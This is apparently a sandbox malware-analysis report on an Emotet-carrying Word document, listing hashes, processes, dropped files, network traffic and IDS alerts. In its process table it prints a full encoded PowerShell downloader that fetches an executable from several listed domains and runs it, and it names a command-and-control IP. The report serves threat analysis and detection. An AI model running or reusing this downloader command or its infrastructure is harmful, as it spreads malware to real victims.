File name: | dati.doc |
Full analysis: | https://app.any.run/tasks/898adff9-88cc-4e75-960e-0e7ee9080ff1 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | October 14, 2019, 13:33:33 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Brand, Subject: West Virginia, Author: Alford Gutmann, Keywords: Isle, Comments: reboot, Template: Normal.dotm, Last Saved By: Lesley Kovacek, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Oct 14 09:04:00 2019, Last Saved Time/Date: Mon Oct 14 09:04:00 2019, Number of Pages: 1, Number of Words: 30, Number of Characters: 171, Security: 0 |
MD5: | 8189BF9DD586B5F2E482087FD08F61F9 |
SHA1: | F122B34499D5CA73A60D61D8A25FDA960FECF4B8 |
SHA256: | BEB93578E6FDBD88EE83913AAB8D262D52171D49BB33E1595A675792BF14F7DF |
SSDEEP: | 6144:2aHde0oWhKUzSOnLx39DhNJJeCznfCLMcbrMN:2aHdeGwUGOt37JeRH |
.doc | | | Microsoft Word document (34.5) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (20.5) |
Title: | Brand |
---|---|
Subject: | West Virginia |
Author: | Alford Gutmann |
Keywords: | Isle |
Comments: | reboot |
Template: | Normal.dotm |
LastModifiedBy: | Lesley Kovacek |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2019:10:14 08:04:00 |
ModifyDate: | 2019:10:14 08:04:00 |
Pages: | 1 |
Words: | 30 |
Characters: | 171 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | Doyle, West and Funk |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 200 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
Manager: | Flatley |
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2740 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\dati.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
1428 | powershell -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABhADAAeAAyAGIAMQBjADMAMgAwAGQAMAAzADIAMwAyADUAPQAnAGEAMAB4AGQAMwA1AGIAOABmAGUAOQA2ADMAZQBlADMAJwA7ACQAYQAwAHgAMQBmAGUAZgA0ADEAMAA5ADkAYwA5ADQANAA5ACAAPQAgACcANgAzADgAJwA7ACQAYQAwAHgAOQAxAGMAZQAyADcANgBmAGYAZgAxAD0AJwBhADAAeABmAGMANwA0ADYAOQA3ADEANAA5AGQAMgBjACcAOwAkAGEAMAB4AGIANgBkADcAYQBkAGMAYgAyADYAMgAwAGUAOQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAYQAwAHgAMQBmAGUAZgA0ADEAMAA5ADkAYwA5ADQANAA5ACsAJwAuAGUAeABlACcAOwAkAGEAMAB4AGYANAAxADkAOABjADkAMQA1ADcAMwA5AD0AJwBhADAAeAA2AGIANwBmAGUAYQA5AGIAOQA4AGEAMAAnADsAJABhADAAeABiADkAOQBjADMANwBhAGUAMAAwAD0AJgAoACcAbgBlACcAKwAnAHcALQBvAGIAJwArACcAagBlAGMAdAAnACkAIABOAEUAVAAuAFcARQBCAEMAbABJAGUAbgB0ADsAJABhADAAeABhADAAZgBkADEAZQBkADMAMABhAD0AJwBoAHQAdABwADoALwAvAGQAZQByAGUAZABpAGEALgBjAG8AbQAvAGMAZwBpAC0AYgBpAG4ALwBTAFMAQQBuAE0ATgBnAFcAYgA4AC8AKgBoAHQAdABwADoALwAvAGMAaAB1AGEAdgBpAGUAbQB4AG8AYQBuAGcAeQBkAHUAYwAuAGMAbwBtAC8AcQA1AGoAaAA4AGQALwBQAC8AKgBoAHQAdABwADoALwAvAHcAdwB3AC4AYgBvAG0AcABhAHMALgBmAHIALgBtAGkAYQBsAGkAYQBzAC4AbgBlAHQALwB3AHAALwBvAC8AKgBoAHQAdABwADoALwAvAHcAdwB3AC4AZwBlAG8AZQB4AHAAZQByAHQALgBnAHIALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwBrADYAbQAvACoAaAB0AHQAcAA6AC8ALwByAHMAdQBkAHMAdQBrAGEALgBkAGUAbQBhAGsAawBhAGIALgBnAG8ALgBpAGQALwBlAHIAcgBvAHIALwBhAHYAMwAzAC8AJwAuACIAcwBgAHAAbABpAFQAIgAoACcAKgAnACkAOwAkAGEAMAB4ADcAZgBiADUAZgAwAGYAYQBkADcANwAzAD0AJwBhADAAeAAyAGQAMgBmADAAYwBkAGQANQAzAGUAJwA7AGYAbwByAGUAYQBjAGgAKAAkAGEAMAB4AGMAZgA1ADkANAA2ADQAYQAxADYANwBhADcAIABpAG4AIAAkAGEAMAB4AGEAMABmAGQAMQBlAGQAMwAwAGEAKQB7AHQAcgB5AHsAJABhADAAeABiADkAOQBjADMANwBhAGUAMAAwAC4AIgBEAE8AdwBgAE4AbABvAGEAZABmAGAAaQBsAEUAIgAoACQAYQAwAHgAYwBmADUAOQA0ADYANABhADEANgA3AGEANwAsACAAJABhADAAeABiADYAZAA3AGEAZABjAGIAMgA2ADIAMABlADkAKQA7ACQAYQAwAHgANABhADkAZgA3ADYANAA5ADUAYgA9ACcAYQAwAHgANgA0AGIAZQAwADgAYQA0AGYAOQAnADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0ASQAnACsAJwB0AGUAJwArACcAbQAnACkAIAAkAGEAMAB4AGIANgBkADcAYQBkAGMAYgAyADYAMgAwAGUAOQApAC4AIgBsAEUAbgBgAEcAYABUAEgAIgAgAC0AZwBlACAAMgA2ADEANwAzACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAHMAdABBAGAAUgB0ACIAKAAkAGEAMAB4AGIANgBkADcAYQBkAGMAYgAyADYAMgAwAGUAOQApADsAJABhADAAeABhADAAOQA3AGEAOQA4ADcAMQAzAGIAPQAnAGEAMAB4AGYAZAAwADAAYwAxADUANQBhADcAMQBmADUAJwA7AGIAcgBlAGEAawA7ACQAYQAwAHgAOQBkAGEAZQA0ADQANgBjAGQAZgBjADMANgA4AD0AJwBhADAAeAA4ADgAYwAzAGUAZABhAGYANAA2ADEANQAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABhADAAeABkADIAOAA1ADEAMgBmADMAOQAwADMAMQAwAGUAPQAnAGEAMAB4ADcAZQA2ADQAZAAyADcANQBmAGQAMwA0ACcA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3404 | "C:\Users\admin\638.exe" | C:\Users\admin\638.exe | — | powershell.exe |
User: admin Integrity Level: MEDIUM Description: DirectoryBrowse MFC Application Exit code: 0 Version: 1, 0, 0, 1 | ||||
1216 | --1053a279 | C:\Users\admin\638.exe | 638.exe | |
User: admin Integrity Level: MEDIUM Description: DirectoryBrowse MFC Application Exit code: 0 Version: 1, 0, 0, 1 | ||||
3624 | "C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe" | C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe | — | 638.exe |
User: admin Integrity Level: MEDIUM Description: DirectoryBrowse MFC Application Exit code: 0 Version: 1, 0, 0, 1 | ||||
2604 | --f91b2738 | C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe | msptermsizes.exe | |
User: admin Integrity Level: MEDIUM Description: DirectoryBrowse MFC Application Version: 1, 0, 0, 1 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2740 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRA7D3.tmp.cvr | — | |
MD5:— | SHA256:— | |||
1428 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\RWWTFFAZV47695QKW3OF.temp | — | |
MD5:— | SHA256:— | |||
2740 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AAC86995.wmf | wmf | |
MD5:6EB97E0BBD9203F84B4DC200C82D7087 | SHA256:8601B16D132A2951DE501B503471EC0E96D84FC633CF5BAEBE4F3397D8B34934 | |||
2740 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:ACF349557872A0742B5BF2A16B8A2D3E | SHA256:A48F7489D790467FAC95403383C55502AC84585F5C79CEF85F2CA68F96ED8E7E | |||
2740 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | |
MD5:D3D2BA832DD1C0B112A7A8485B3F508B | SHA256:FD030B35AE508E14FEFDB70CBDB2B369DD35D5343B57066E9B0B329CA0B0B516 | |||
2740 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$dati.doc | pgc | |
MD5:97E9D66758A6FBAC8251EBDD3C506E74 | SHA256:85E02718562BB8914BDBB07EE88C69729FBAC6F3FECF6C1BE107E9F0691C4830 | |||
1428 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:35375F3D71AE42AA9777154D256B33BF | SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF | |||
2740 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8A041EE4.wmf | wmf | |
MD5:CE43F1FAC623BBC22C924624C31BF65B | SHA256:244A3D4B24DDA0A0FAEC64647C2197C7384FA976E4BD883BF50A993D8E94E8FE | |||
2740 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E069CCAF.wmf | wmf | |
MD5:3F5414B5C9A1D4D20B6C274CD3907AC9 | SHA256:8546FE28B1A54A51461D0BF1B755DF6E581392B0C8D15FD8DBFE577A1137D213 | |||
2740 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D5CBBA92.wmf | wmf | |
MD5:3D85CB8DB19F871BFAB7D2E13347CBB7 | SHA256:E757A558435B96E8A65C4299276A3EB8CF323152BA1DA6A2A9B836CDE01218DE |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2604 | msptermsizes.exe | POST | — | 186.75.241.230:80 | http://186.75.241.230/sym/guids/add/ | PA | — | — | malicious |
1428 | powershell.exe | GET | 200 | 103.221.221.127:80 | http://chuaviemxoangyduc.com/q5jh8d/P/ | VN | executable | 540 Kb | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
— | — | 186.75.241.230:80 | — | Cable & Wireless Panama | PA | malicious |
1428 | powershell.exe | 103.221.221.127:80 | chuaviemxoangyduc.com | The Corporation for Financing & Promoting Technology | VN | suspicious |
1428 | powershell.exe | 162.144.93.20:80 | deredia.com | Unified Layer | US | suspicious |
Domain | IP | Reputation |
---|---|---|
deredia.com |
| suspicious |
dns.msftncsi.com |
| shared |
chuaviemxoangyduc.com |
| suspicious |
PID | Process | Class | Message |
---|---|---|---|
1428 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
1428 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
1428 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
2604 | msptermsizes.exe | A Network Trojan was detected | ET CNC Feodo Tracker Reported CnC Server group 9 |